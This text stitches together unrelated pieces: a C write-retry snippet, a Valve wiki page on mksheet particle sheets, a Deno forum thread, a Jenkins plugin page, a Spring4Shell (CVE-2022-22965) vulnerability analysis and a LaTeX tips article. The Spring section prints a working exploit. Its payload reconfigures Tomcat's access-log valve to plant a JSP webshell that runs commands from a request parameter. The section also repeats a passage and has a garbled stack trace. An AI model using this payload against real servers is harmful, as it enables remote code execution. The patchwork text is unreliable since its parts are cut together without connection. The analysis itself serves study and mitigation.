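As a footnote to the write-interruption discussion earlier in this archive: the portable way for native code to cope with both EINTR and short writes is a retry loop. The sketch below is my own generic POSIX illustration, not Excelsior JET code, and the helper name write_all is made up:

```c
#include <errno.h>
#include <unistd.h>

/* Write exactly len bytes to fd, retrying on EINTR and after short writes.
   Returns len on success, -1 on a real error. */
ssize_t write_all(int fd, const void *buf, size_t len) {
    const char *p = buf;
    size_t left = len;
    while (left > 0) {
        ssize_t n = write(fd, p, left);
        if (n < 0) {
            if (errno == EINTR)
                continue;        /* interrupted by a signal: just retry */
            return -1;           /* genuine I/O error */
        }
        p += n;                  /* short write: advance past what was written */
        left -= (size_t)n;
    }
    return (ssize_t)len;
}
```

Native libraries that call write() once and assume the full count was transferred are exactly the ones that break under a VM whose threading delivers signals, as discussed above.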
Animated Particles
From Valve Developer Community
Revision as of 01:29, 4 July 2008 by TomEdwards (talk | contribs)

Particles are animated by using a material comprised of a collection of materials all built together into a "sheet". This is accomplished by using the mksheet.exe tool.

Creating an MKS File

First, place the materials that will make up the sheet in a separate sub-directory, usually named for the material they will ultimately represent. For instance, smoke1.vmt is placed under the materials/particles/smoke1 subdirectory.

Next, create a file with the same name as the material you'd like to make, and give it an .mks file extension. For smoke1.vmt, you would call this smoke1.mks.

The .mks file defines how the sheet is interpreted when the particle is rendered. You can organize materials into sequences for playback, define the number of frames and their playback rate, and whether a sequence should loop continuously. In the .mks file, this looks like:

// First sequence
sequence 0
loop
frame mymaterial1.tga 1
frame mymaterial2.tga 1

// Second sequence
sequence 1
frame mymaterial3.tga 1

// multiple image sequence (two images per frame, for multi-texturing)
sequence 2
frame fire_base0.tga fire_additive0.tga 1
frame fire_base1.tga fire_additive1.tga 1

// Sequence that combines the alpha channels of two frames at a time
// into the alpha and green channels of a frame for a special shader
sequence 3
frame frame0.tga{g=a},frame1.tga{a=a} 1
frame frame2.tga{g=a},frame3.tga{a=a} 1

sequence
Tells mksheet that the following frames are to be grouped together into a sequence, which can be referred to by number. This allows you to pick different animations or frame groups when the particle is created.

frame
Takes two parameters. The first is the material to use for this frame. The second is the playback rate. A value of 1 tells the renderer to play back this frame for the normal time duration.
A value of 0.5 would play the frame for half as long as was specified in the particle definition, and a value of 2 would make the frame render for twice as long.

loop
Tells the renderer to loop the frames continuously. Without this identifier the renderer would play all the frames in the sequence once and stop on the last frame.

Additionally, frames can be packed with RGB separate from alpha. This takes the alphas from a set of input frames and stores them in the alpha of the output sheet, and takes the RGBs and stores them in the RGB. The interesting thing about this is that each gets its own sequences. Their frame sizes are also entirely decoupled, so the RGBs can have 200x200 images while the alpha has 150x150, for example. See below:

// Sequence that stores separate frame data in the RGB from the alpha
// for dual sequencing combining one set of RGBs and another set of alphas

// Packmode sets mksheet to separate the RGB frames from the Alpha ones.
packmode rgb+a

// First Sequence - Looping Alpha Frames
sequence-a 0 LOOP
frame reframedSmokeSprites170_0033.tga 1
frame reframedSmokeSprites170_0035.tga 1

// Second Sequence - Looping RGB Frames
sequence-rgb 1 LOOP
frame smokeTex0001_341.tga 1
frame smokeTex0002_341.tga 1

The output from this .mks file can be seen below; the RGB and alpha channels are shown. Note that the individual frame sizes are all non-power-of-two and that they differ between the RGB and Alpha frames.

Example output - RGB
Example output - Alpha

Compiling the Sheet

Once the materials are in the proper directory, along with the .mks file, you can compile the images into one sheet. To do this, we use the mksheet.exe tool:

mksheet sheet.mks [sheet.sht sheet.tga]

The tool takes one main parameter and two optional ones. The first is the .mks sheet, which defines how the .sht and .tga files are created. The second, optional parameter is the .sht file to create (used by the engine).
Finally, the third optional parameter is the .tga file to create, which is the packed version of all the materials specified in the .mks file. The second and third parameters should almost always bear the name of the ultimate material you wish to create. For example, the build call for the smoke1.vmt material would be:

mksheet smoke1.mks [smoke1.sht smoke1.tga]

UPDATE: .sht files are no longer used by the engine - they are now incorporated directly into the .vtf.

Compiling the Texture

At this point you should have a .sht and a .tga file. You can now compile the output .tga file using the vtex.exe tool like any other material. The vtex.exe tool will automatically place the .sht file in the correct place. Once the material is compiled, it is ready for use in the engine.

UPDATE: .sht files are no longer used by the engine and are not required.

Warning: VTFEdit probably doesn't support this type of compiling yet.

Notes

You can use the same image file in multiple sequences (or multiple times within the same sequence) without it being duplicated in the output sheet. Examples of where you would want to do this are sequences with different timing, particle sequences, looped and non-looped versions of a sequence, etc.

To the extent practical, you should combine as many sprite textures into one sheet as possible, and use different sequences for the different particle systems (hmm, this implies that we might want named sequences for sanity's sake). This will allow particle systems to be drawn with fewer state changes or even as one batch.
max (2mo ago)
Deno.serve: Is it possible to flush a streaming response?

I've been playing around with this: https://docs.deno.com/examples/http-server-streaming

I am coming from Go and I'm used to having the functionality to flush the http response to the socket, allowing lots of control over when bytes are sent over the wire (like so: https://robpike.io/). Is there any mechanism to prompt Deno to write to the socket? Maybe another streaming response type? Thanks!

2 Replies

Deno AI Helper (2mo ago)
I wasn't able to find the answer to your question in the official Deno documentation. However, based on the information you've provided, I can offer some general advice.

In Deno, when you're working with streaming responses, you typically use the ReadableStream API to send data in chunks. The data is sent to the client as it's being read from the stream. However, there isn't a direct equivalent to Go's Flush method in Deno's standard library that I can reference from the official documentation.

If you're using the example from the Deno documentation for streaming responses, make sure you're following the pattern of using a ReadableStream to send data in chunks. Here's a simplified example of how you might send chunks of data:

const body = new ReadableStream({
  start(controller) {
    controller.enqueue("First chunk of data,");
    controller.enqueue("second chunk of data,");
    // ...
    controller.close();
  },
});

await Deno.serve((req) => new Response(body), { port: 8000 });

In this example, each call to controller.enqueue() sends a chunk of data to the client. However, this is not based on the Deno documentation, and I advise you to double-check the accuracy of this advice.
If you need more control over the timing of when bytes are sent over the wire, you might need to look into lower-level APIs or third-party libraries that could offer more granular control over the response stream. Remember to check the Deno third-party modules (https://deno.land/x) for any libraries that might provide the functionality you're looking for.

dantheman (2mo ago)
I find that Deno will flush the response continuously, as you give data to the response stream. And for emitting a streaming response I sometimes find it easier to yield chunks from an async generator function; here's a basic example: https://dash.deno.com/playground/sour-bobcat-21

I don't know what makes a browser show partial pages like the robpike example.

Ah! It looks like Deno Deploy's default compression buffers output into chunks. I got the expected continuous output in Chrome after adding this response header:

Cache-Control: no-transform

Hope this helps 🙂
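To make the async-generator pattern dantheman mentions concrete, here is a runtime-agnostic sketch of my own using the web-standard ReadableStream (the same type Deno.serve accepts as a Response body); it is not code from the linked playground. In Deno you would return new Response(streamFromGenerator(ticks())) from the handler. Each chunk is handed to the consumer as soon as it is pulled, which is the "continuous flush" behavior described above:

```javascript
// Wrap an async generator as a ReadableStream of UTF-8 encoded chunks.
function streamFromGenerator(gen) {
  const encoder = new TextEncoder();
  return new ReadableStream({
    async pull(controller) {
      const { value, done } = await gen.next();
      if (done) controller.close();
      else controller.enqueue(encoder.encode(value));
    },
  });
}

// Produce chunks one at a time; a real handler might await a timer
// or new data between yields.
async function* ticks() {
  for (let i = 1; i <= 3; i++) {
    yield `tick ${i}\n`;
  }
}

// Read the stream chunk by chunk, the way an HTTP client would.
async function collectChunks(stream) {
  const reader = stream.getReader();
  const decoder = new TextDecoder();
  const chunks = [];
  for (;;) {
    const { value, done } = await reader.read();
    if (done) return chunks;
    chunks.push(decoder.decode(value));
  }
}
```

Note that the chunks arrive one by one rather than as a single concatenated body; whether the client sees them incrementally then depends on intermediaries, which is why the Cache-Control: no-transform tip matters on Deno Deploy.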
Artifact diff 1.3
Minimum Jenkins requirement: 1.532
ID: artifact-diff-plugin
Installs: 417
Last released: 3 years ago
Maintainers: Oliver Gondža
Dependencies: No dependencies found

View Artifact diff Plugin on the plugin site for more information.

Artifact diff plugin

The plugin can compare the content of an artifact, identified by its relative path, across different builds.

URL format

The plugin introduces a transient build action under the artifact-diff URL name. The action itself consumes a build number to compare against, followed by an artifact path:

<buildUrl>/artifact-diff/<otherBuildNumber>/<artifactPath>

The output argument is used to switch between html (the default) and plain text output.

• output = html|plain

Output format

• The plugin uses the Unified diff format to represent artifact differences.
• The /dev/null placeholder filename is used to represent an artifact that could not be read; such an artifact is then treated as empty.
• An empty diff sequence is used when both artifacts are equal.

Changelog

1.2
• Fix RunList-related regression
SummerSec

Spring Framework RCE CVE-2022-22965 Vulnerability Analysis

Abstract

This article analyzes the vulnerability CVE-2022-22965 from several angles, starting with how the payload is constructed. I always like to analyze a vulnerability's payload first; I have to admit my skill is not yet at the level of analyzing the vulnerability directly. So I start from the payload: studying how a payload is built always teaches interesting angles and ideas. Analyzing the payload construction lets you think from a vulnerability hunter's perspective about a sink point: how to search for a data-flow path, and how to satisfy a path that flows into the sink. After that, I bring in some static program analysis (SPA) knowledge and use a call graph to analyze part of the functionality; finally, I look at how the vulnerability was fixed.

Payload Construction

Below is the most widespread payload for this RCE; it does not look particularly difficult. It hides a few small points of knowledge, analyzed one by one below. At a high level, the payload consists of two parts: request headers and a request body.

headers = {
    "suffix":"%>//",
    "c1":"Runtime",
    "c2":"<%",
}

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){
java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
while((a=in.read(b))!=-1){
out.println(new String(b));
}
}
%{suffix}i
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

Knowledge point: the Tomcat access log

The access log file is configured in the server.xml file under Tomcat's conf directory:

<!-- Access log processes all example.
Documentation at: /docs/config/valve.html
Note: The pattern used is equivalent to using pattern="common" -->
<Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs"
       prefix="localhost_access_log" suffix=".txt"
       pattern="%h %l %u %t &quot;%r&quot; %s %b" />

className="org.apache.catalina.valves.AccessLogValve" selects the class that implements the access log, which controls the log file's name, file suffix, output format, and so on. From this we can already roughly understand the roles of suffix, prefix and pattern in the payload.

image-20220404194617108
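For illustration, the five class.module.classLoader.resources.context.parent.pipeline.first.* properties in the payload are, in effect, reconfiguring the running AccessLogValve as if server.xml had contained an entry like the following. This is a reconstruction of mine: the exploit sets these fields reflectively at runtime rather than through server.xml, and the pattern value is the JSP webshell source rather than a log format string:

```xml
<Valve className="org.apache.catalina.valves.AccessLogValve"
       directory="webapps/ROOT"
       prefix="tomcatwar"
       suffix=".jsp"
       fileDateFormat=""
       pattern="[JSP webshell source]" />
```

With these settings the "access log" becomes webapps/ROOT/tomcatwar.jsp, a web-reachable JSP file whose contents are attacker-controlled.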
Documentation at: /docs/config/valve.html
Note: The pattern used is equivalent to using pattern="common" -->
<Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs"
       prefix="localhost_access_log" suffix=".txt"
       pattern="%h %l %u %t &quot;%r&quot; %s %b" />

className="org.apache.catalina.valves.AccessLogValve" selects the class that governs the log file: its file name, file suffix, output pattern, and so on. This roughly explains the roles of suffix, prefix, and pattern in the payload.

The payload also uses the %{...}i format. Consulting the Tomcat documentation, this syntax is modeled on the Apache HTTP Server log configuration syntax and supports writing incoming or outgoing headers, cookies, session or request attributes, and specially formatted timestamps.

This also explains the few special headers in the request and what they do. The payload can therefore be rewritten into the equivalent form below:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=<%
if("j".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
}
%>//
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

Background: the JDK module system

JDK 9 introduced JPMS (the Java Platform Module System), also known as Project Jigsaw. Modularization splits a large project into modules; each module is an independent unit, and modules can reference and call one another.

After modules were introduced, the historical vulnerability that had been patched (CVE-2010-1622) could be bypassed via the module feature.

Background: the nested structure of AbstractNestablePropertyAccessor

To understand why the payload path is as long as class.module.classLoader.resources.context.parent.pipeline.first.suffix, you need to understand the nested structure handled by AbstractNestablePropertyAccessor. To help, here is a small demonstration class:

public class School {
    String name;
    Student student;
    // TODO: add setters and getters
    public static class Student {
        String name;
        Age age;
        // TODO: add setters and getters
    }
    public static class Age {
        int age;
        // TODO: add setters and getters
    }
    // Setters and getters are omitted for brevity; add them if you run this.
}
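The dotted-path traversal that this School/Student/Age demo illustrates can also be sketched language-agnostically. The toy Python below is an illustration only (Spring's real logic is the Java in AbstractNestablePropertyAccessor): the path is split at each '.' and one getter is followed per segment, which is exactly how class.module.classLoader ends up resolving to getClass().getModule().getClassLoader():

```python
class Age:
    def __init__(self, age):
        self.age = age

class Student:
    def __init__(self, name, age):
        self.name, self.age = name, age

class School:
    def __init__(self, name, student):
        self.name, self.student = name, student

def get_nested(root, path):
    """Walk a dotted property path one segment at a time, mirroring
    getNestedPropertySeparatorIndex + the per-segment property lookup."""
    target = root
    for segment in path.split("."):
        target = getattr(target, segment)  # one 'getter' per segment
    return target

school = School("beijing", Student("wangshuai", Age(18)))
print(get_nested(school, "student.age.age"))  # → 18

# The danger: nothing stops a path from stepping into object metadata,
# the Python analogue of Spring's 'class' property descriptor.
print(get_nested(school, "__class__").__name__)  # → School
```

Nothing in the plain traversal distinguishes a harmless data property from a metadata property, which is why the real fix has to blacklist specific descriptors.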
The corresponding driver code (the demo class source comes from struts-tester/struts-tester.jsp):

public static void main(String[] args) throws Exception {
    java.util.HashSet set = new java.util.HashSet<Object>();
    School school = new School();
    school.setName("beijing");
    School.Student student = new School.Student();
    student.setName("wangshuai");
    School.Age age = new School.Age();
    age.setAge(18);
    student.setAge(age);
    school.setStudent(student);
    Object target = demo.applyGetChain(school, "");
    boolean debug = false;
    demo demo = new demo();
    demo.processClass(target, System.out, set, "", 0, debug);
}

From this output it is easy to see how class.module.classLoader.resources.context.parent.pipeline.first.suffix is constructed, and the same output reveals further exploitable gadget chains.

Root-Cause Analysis

Having analyzed the most widespread payload, we can now look at how the vulnerability arises, which makes the problematic spots clear. By now it is evident that this is a legitimate feature being abused; reading the implementation source shows how it works, how likely a recurrence is, and how to recognize similar code in the future.

Set a breakpoint at org.springframework.beans.AbstractNestablePropertyAccessor#getPropertyAccessorForPropertyPath and look at its call graph first (original image: call-graph). A call graph gives a fairly intuitive view of data flowing in and out; it is easy to spot the chain getPropertyValue -> getFirstNestedPropertySeparatorIndex -> getNestedPropertyAccessor -> getPropertyAccessorForPropertyPath.

Debugging the call stack, however, shows that it is not getPropertyValue that calls getPropertyAccessorForPropertyPath but setPropertyValue:

getPropertyAccessorForPropertyPath(String):815, AbstractNestablePropertyAccessor (org.springframework.beans), AbstractNestablePropertyAccessor.java
setPropertyValue(PropertyValue):256, AbstractNestablePropertyAccessor (org.springframework.beans), AbstractNestablePropertyAccessor.java
setPropertyValues(PropertyValues, boolean, boolean):104, AbstractPropertyAccessor (org.springframework.beans), AbstractPropertyAccessor.java
applyPropertyValues(MutablePropertyValues):856, DataBinder (org.springframework.validation), DataBinder.java
doBind(MutablePropertyValues):751, DataBinder (org.springframework.validation), DataBinder.java
doBind(MutablePropertyValues):198, WebDataBinder (org.springframework.web.bind),
WebDataBinder.java
tomcat.util.threads), TaskThread.java

Reading the source shows that getPropertyValue inside AbstractNestablePropertyAccessor also calls getPropertyAccessorForPropertyPath. This is one drawback of a call graph: compared with a true data-flow graph it falls short, but a static call graph is still a very valuable auxiliary analysis aid.

In org.springframework.beans.PropertyAccessorUtils#getNestedPropertySeparatorIndex, the code locates the position of the '.' separator and returns it. Splitting on '.', the string class is extracted first, then module, classLoader, and so on. nestedPath records the remaining path after the split and nestedProperty the extracted segment; both are passed into getNestedPropertyAccessor.

The first call to getNestedPropertyAccessor creates a HashMap and then calls getPropertyValue.

getPropertyValue calls getLocalPropertyHandler. Since getLocalPropertyHandler is abstract, the implementation invoked is the one in BeanWrapperImpl. BeanWrapperImpl implements AbstractNestablePropertyAccessor, and because JavaBeans have an introspection mechanism, setIntrospectionClass is called before getLocalPropertyHandler. Inside getLocalPropertyHandler, getCachedIntrospectionResults is called first; since the BeanWrapperImpl's CachedIntrospectionResults is null at that point, org.springframework.beans.CachedIntrospectionResults#forClass creates a new CachedIntrospectionResults object.

The constructor of CachedIntrospectionResults contains the fix for the earlier historical vulnerability, but since Java 9 added the module mechanism, that fix can be bypassed.

First a property descriptor for class, pointing at getClass(), is added to propertyDescriptors; the loop then adds module, pointing at getModule(), and so on.

After all descriptors have been added, the value to the right of the '=' is taken; the implementation is org.springframework.beans.AbstractNestablePropertyAccessor#processLocalProperty, which finally calls BeanWrapperImpl#setValue to perform the assignment.

The Fix

Unlike the earlier fix, which checked the property descriptor's name, the new fix checks the descriptor's type directly, blacklisting the ClassLoader and ProtectionDomain classes outright.

A temporary mitigation is shown below: the string array {"class.*","Class.*","*.class.*","*.Class.*"} is added to a blacklist, so case changes cannot bypass it. But why call WebDataBinder#setDisallowedFields?
@ControllerAdvice
@Order(Ordered.LOWEST_PRECEDENCE)
public class GlobalControllerAdvice {
    @InitBinder
    public void setAllowedFields(WebDataBinder dataBinder){
        String[] abd = new String[]{"class.*","Class.*","*.class.*","*.Class.*"};
        dataBinder.setDisallowedFields(abd);
    }
}

Going back to where the vulnerability starts and looking a few frames up the stack, we find a WebDataBinder object. After an incoming request passes through a series of filters and handlers, it is first handled by a ServletRequestDataBinder object and then by a WebDataBinder; it is WebDataBinder that provides the method for declaring which fields are disallowed. Once those fields are set, the malicious request is filtered out inside WebDataBinder and receives no further processing.

Introspection

Below is a minimal use of the introspection mechanism under the Spring framework. The fifth line, bwl.setPropertyValue("student.name", "张三");, with its nested path student.name, makes it easier to understand how the payload is constructed and why getNestedPropertySeparatorIndex needs to split the string.

public static void main(String[] args) throws InvocationTargetException, IllegalAccessException {
    BeanWrapperImpl bwl = new BeanWrapperImpl(new School());
    bwl.setAutoGrowNestedPaths(true); // auto-grow nested property paths
    bwl.setPropertyValue("name", "北京大学");
    bwl.setPropertyValue("student.name", "张三");
    PropertyDescriptor[] pds = bwl.getPropertyDescriptors();
    Set<String> propertyNames = new HashSet<String>();
    for (PropertyDescriptor pd : pds) { // print each property's name, type and value
        System.out.println(pd.getName() + " : " + "" + pd.getPropertyType() + " : " + pd.getReadMethod().invoke(bwl.getWrappedInstance()));
        propertyNames.add(pd.getName());
    }
    System.out.println(Arrays.toString(propertyNames.toArray(new String[propertyNames.size()])));
}

Environment-Setup Notes

When debugging with IDEA hot deployment, configure it as follows: under Deployment choose "exploded". The output path shown in the project configuration is the web path; a JSP added under that path is parsed dynamically. When attacking the site with the PoC, the directory in the payload must be an absolute path. If it is not absolute, the webshell ends up in the temporary path below, because IDEA automatically sets up a temporary Tomcat configuration environment:

C:\Users{Name}\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat

References

- Tomcat access log configuration
- Analysis of the SpringMVC framework arbitrary code execution vulnerability (CVE-2010-1622)
- Spring Beans RCE analysis
- The spring-framework patch on GitHub
LaTeX Tricks (VII)

LaTeX - General
Written by Luca Merciadri, Wednesday, 20 March 2013

We shall see some tricks:

1. Putting two itemizations on the same line,
2. Using footnotes in boxes,
3. Dealing with PDF cut-and-paste and search functionalities, even when you are using accented characters,
4. Making a distinction with \overline for propositional logic formulae,
5. Referring to labels by long names.

We will then discuss some problems people often face when dealing with many figures, and, more generally, floats, in reports. Finally, we will deal with a Beamer scheme which aims at using a single file for both a presentation and the related report.

By Luca Merciadri, http://www.student.montefiore.ulg.ac.be/~merciadri/

Putting two itemizations on the same line

Example

Say you want two items on the same line.

Code

This is achieved thanks to

\begin{enumerate}
\item First item
\item Second item
\item[\refstepcounter{enumi}\labelenumi%
  -- \refstepcounter{enumi}\labelenumi] % Third and fourth items
\item Fifth item
\end{enumerate}

Thanks to Philipp Stephani (see [7]).

Using footnotes in boxes

Example

Say you want this (note the footnote).

[figure: a footnote mark inside a box, with the footnote text at the bottom of the page]

You will notice that a footnote was placed at the bottom of the page, as desired. In general, generating footnotes from inside a box is not easy because of internal \footnote limitations. [6] You might use a different syntax than \put and \framebox for boxes, but if you want to stick with this syntax, a first solution is to use \footnotemark, which generates the footnote mark in the text, together with \footnotetext{...}, which generates the footnote text. The former needs to be put in the box (so that the number actually appears in the box), while the latter needs to be given outside the box, but on the same page.
[6]

Code

This is the approach that I used:

\footnotetext{This is a fruit}
\addtocounter{footnote}{-1}
{\setlength{\unitlength}{6mm}
\begin{picture}(13,7)(0,0)
\put(0,3){\framebox(4,2){This is Box 1}}
\put(7,0){\framebox(5,2){
\shortstack{100 Apples\footnotemark are\\%
in Box 2}}}
\put(4,4){\vector(1,1){2.8}}
\put(7,3){\framebox(5,2){
\shortstack{This is box three}}}
\put(4,4){\vector(1,0){2.8}}
\put(7,6){\framebox(5,2){
\shortstack{ This is box 4}}}
\put(4,4){\vector(1,-1){2.8}}
\end{picture}
}

The advantage of this approach is that it is relatively 'clean', i.e. you are not obliged to use \textsuperscript for the numbering, be it in the box or in the footnote. Thanks to Heiko Oberdiek at [6] for this. Note that many other solutions are available for drawing diagrams, such as DOT.

PDF compatibility

In our last article, we dealt extensively with 'input encoding'. Here, we will detail two PDF problems, search and copy-and-paste, with their respective solutions. One might generate a PDF document using LaTeX2e, but if this document contains accented characters, searching for words containing accented characters can fail, depending on the PDF reader. The first problem is that the default font encoding is OT1. It generally deals correctly with basic ASCII characters and the PDF operations on them, but once you use accented characters, it might cause trouble with some PDF readers. A solution is to use the T1 font encoding, conjointly with the cmap package. As a result, the

\usepackage[T1]{fontenc}
\usepackage{cmap}

set of directives should fix search and copy-and-paste in traditional PDF readers, even for Greek symbols in formulae. [5]

Propositional Logic

Let us express the dual of A as \overline{A}. The major problem with \overline is that if you write things like \overline{A}\overline{B}, the result looks exactly the same as \overline{AB}. Now the latter is equal to \overline{A} + \overline{B} by De Morgan's laws, and thus differs from the former on a truth table.
So, a distinction needs to be made. Enrico Gregorio gave me the solution at [1]. Implement

\newcommand{\closure}[2][3]{{}%
  \mkern#1mu\overline{\mkern-#1mu#2}}

and then write

\closure{A}\closure{B}

and compare it to

\closure{AB}

[figure: the two closures compared]

One can now see the difference. This command accepts one optional argument and one mandatory argument, and it works this way (thanks to Claudio Beccari for a detailed explanation):

1. it advances by #1mu (#1 is the optional number); mu is the special math length unit equivalent to 1/18th of 1em of the current font, so that it obeys the different sizes used in math for the main formula and for the first- and second-order sub- and superscripts,
2. it overlines an argument made up of the following items,
3. a negative math kern of #1mu, in order to step back by the same amount it advanced in step 1,
4. the second argument, represented by #2.

The 'step forward – step back' procedure is used because the overline is a little shorter than it would be if the step back were absent; therefore \closure{A}\closure{B} do not have touching overlines and produce a different result than \closure{AB}. Of course, the optional amount of kerning may depend on the actual mandatory argument. For example, arguments that fill their bounding box, such as H, M, N, Z, T, I, would maybe require 3mu, while for arguments that do not fill their bounding box, such as A, O, S, C, and the like, 2mu or 1.5mu might be better values. The optional argument to \closure, such as in \closure[2]{A}, is thus meant to correct possible 'errors' due to letter form.

Referring to labels by long names

Code

Say you want to \label{} e.g. an enumerate environment's item. You then have, for example,

\begin{enumerate}
\item First item,
\item Second item.
\end{enumerate}

Now, one wants to say 'see Item 1'. This can be achieved using

\begin{enumerate}
\item First item, \label{item:firstitem}
\item Second item.
\end{enumerate}

and then, 'see Item \ref{item:firstitem}' somewhere in the text. This is the traditional approach to the \ref and \label commands. But now, how does one manage if he wants to write 'see Item \ref{item:firstitem}' and wants 'see Item [name]' to appear, where [name] is an attribute of \label, for example defined like

\begin{enumerate}
\item First item, \mylabel{item:firstitem}{%
Fruits and Co.}
\item Second item.
\end{enumerate}

where, here, [name] is 'Fruits and Co.'? He could then have, in the output, 'see Item Fruits and Co.' For this, I did not try using zref, but used Mr. Oberdiek's trick ([4]):

\makeatletter
\newcommand*{\mylabel}[2]{%
  \@bsphack
  \begingroup
    \def\@currentlabel{#2}%
    \label{#1}%
  \endgroup
  \@esphack
}
\makeatother

Example

This gives

1. First item,
2. Second item

and a reference to the first item reads 'Fruits and Co.' Note also that the nameref package exists, which solves the closely related problem of e.g. including the name of a section when cross-referencing.

Float management

Many LaTeX beginners are often frustrated when, after compilation, their figures, tables, and, more generally, floats appear in incongruous places. For example, one might already have a 'sufficient' number of floats on one page, the following floats being moved to the following page(s). From a content-oriented point of view, it is sometimes disturbing, be it to the reader or to the writer, to look at such behavior without any clue about how to deal with this placement. Before trying anything, it is important to understand, briefly, why and how LaTeX places floats this way. It is typographically ill-advised to put too many images or tables on one page, or, more generally, in the 'main matter' of a document. If you need to put that many images in your document, ask yourself some questions:

• Is it a good way to present things?
• Shouldn't I select the most important images and tables?
• Couldn’t I put some images and tables on specific pages only, or in the appendices? • ... Once you have clear and responsable answers to these questions, you might still need to fine tune the placement of your floats. If you need to put floats on specific float pages, in the ‘main matter’ of your document, you might use the [p] option after the beginning of your environment: figure, table, etc. However, typography rules sometimes go against your rules, i.e. the way you (want to) present things. If you know what you are doing, you might simply, sometimes, feel the need to include a float at a place where LaTeX does not want it to be at all. If you tried even with the [h!] option, meaning ‘put this float here!’, to no avail, you might consider modifying some internal parameters, because putting an exclamation mark in the list of placement options makes LaTeX ignore all the constraints but \topfraction, \bottomfraction, and the ones with floatpage in their names. [8] Once again, ask you questions: • Are there too much floats on my page? • Is my float too big? • Where am I including my float? If your float is too big, either you resize it until it comes on the desired page, or you let it where LaTeX puts it. But if there are too many floats, you need to know that LaTeX defines a limit on the number of floats by page. Acceptable parameter modifications might be found at [8]: % See p.105 of "TeX Unbound" for suggested values. % See pp. 199-200 of Lamport’s "LaTeX" book for details. % General parameters, for ALL pages: \renewcommand{\topfraction}{0.9} % max frac of fl. at top \renewcommand{\bottomfraction}{0.8} % max frac of fl. at bot. % Parameters for TEXT pages: \setcounter{topnumber}{2} \setcounter{bottomnumber}{2} \setcounter{totalnumber}{4} \setcounter{dbltopnumber}{2} % for 2-column pages \renewcommand{\dbltopfraction}{0.9} % fit big float above 2-col. text \renewcommand{\textfraction}{0.07} % allow minimal text w. 
figs % Parameters for FLOAT pages: \renewcommand{\floatpagefraction}{0.7} % require fuller float pages % N.B.: floatpagefraction MUST be less than topfraction! \renewcommand{\dblfloatpagefraction}{0.7} % require fuller float pages % remember to use [htp] or [htpb] for placement If you find that liberal values of the float parameters still are causing trouble, you can try forcing a float page with \clearpage to disgorge the accumulated blockage. If you do not want to force a pagebreak, use the afterpage package and tell LaTeX \afterpage{clearpage}, which should force a float page when the current page comes to an end. If floats continue to pile up at the end, you probably have one too big to fit on a page; try reducing its size. [8] In extreme cases, you might consider using the float package. [8] LaTeX mechanisms are sufficiently well programmed so that, under normal use, they do not cause you too much trouble with floats, i.e. floats are not rejected too far in the document. In my reports, where I often need to include graphics, I generally encounter no problem, without any specific tuning. Most problematic cases are linked to the question Do I need to let LaTeX put my floats e.g. two pages after where they are included, between some paragraphs which have absolutely no link with these figures, or should I manage to put my figures differently? The answer to this question is that you should normally consider using pages for floats, or at least manage to put figures in pages whose context is linked to the appearing figures. If a float is rejected on the following page, it is generally not too much shocking for the reader, and it might even be a good thing if you prefer this way to present things. But if your floats are rejected further, it generally becomes disturbing for the reader, who needs to look for figures through your document. Beamer and articles When you use the beamer class, you can evidently produce slides (we will call this the presentation), e.g. 
for a conference, but you can also produce a handout. Generally, a handout is considered to be a scaled version of the slides, so that more than one slide fits on the page. This can generally be achieved using PDF tools, and is not our concern here. The case we want to treat here is the one where you write a presentation and want to write a report too, both being related to the same content. This might be interesting if the presentation you are writing mainly consists of a summary of your research. If you want to reuse your beamer presentation to write the article, or the contrary, you can do this in a very simple way, thanks to Mr. Knudsen's explanations at [3], and to [2]. Consider that you have three files:

• content.tex
• presentation.tex
• report.tex

Then, the idea is to put the whole content (i.e. text that will be shown either in the presentation or in the report, the 'or' being inclusive) in content.tex. This file does not need any preamble, because it will be included by both report.tex and presentation.tex. Now, we need to specify how your content will be directed to the presentation, the report, or both. There is a quick way to do this: \mode<presentation> for presentation mode, and \mode<article> for article mode. That means that you will have a file content.tex like

\section{First Section}
\mode<article>
{
  % Appears in the article
}
\frame
{
  \frametitle{My Frame}
  % Appears in both versions
}
% Appears in both versions
% (except if specified differently)

You can then also use the \mode command in the frame content, e.g. to scale images differently. Say you are in a frame. You can then use

\begin{figure}[h]
\centering
\mode<presentation>
{
  \includegraphics[scale=0.2]{img.eps} % small
}
\mode<article>
{
  \includegraphics[scale=1.5]{img.eps} % bigger
}
\caption{Appears in both versions.}
\end{figure}

The report.tex file will be written using e.g.
\documentclass{article}
\usepackage{beamerarticle}
\begin{document}
\input{content.tex}
\end{document}

The presentation.tex file will follow the usual rules:

\documentclass{beamer}
\begin{document}
\input{content.tex}
\end{document}

By using this scheme, your content will reside only in content.tex, which is an advantage for two main reasons:

• you have only one file for the content, for both versions;
• if you reuse many code snippets from your presentation in your report, content modification (e.g. modifying numbers, a caption, a title, ...) is centralized, and, as a result, you only modify things once. This brings extra consistency between your report and your slides.

References

[1] Enrico Gregorio. Appunti di programmazione in LaTeX e TeX, 2009. Second edition. http://profs.sci.univr.it/~gregorio/introtex.pdf.
[2] HAPPYMUTANT.COM. A Quick & Dirty Guide to LaTeX – Making LaTeX Beamer Presentations, 2010. http://happymutant.com/beamer/.
[3] Torben Knudsen and Luca Merciadri. Including only frames in the beamer (comp.text.tex discussion), 2010.
[4] Lars Madsen, Heiko Oberdiek, and Luca Merciadri. Using the ref and label commands so that ref points to the label but with a user-given name (comp.text.tex discussion), 2010.
[5] Günter Milde and Luca Merciadri. Font encodings and PDFs, 2010.
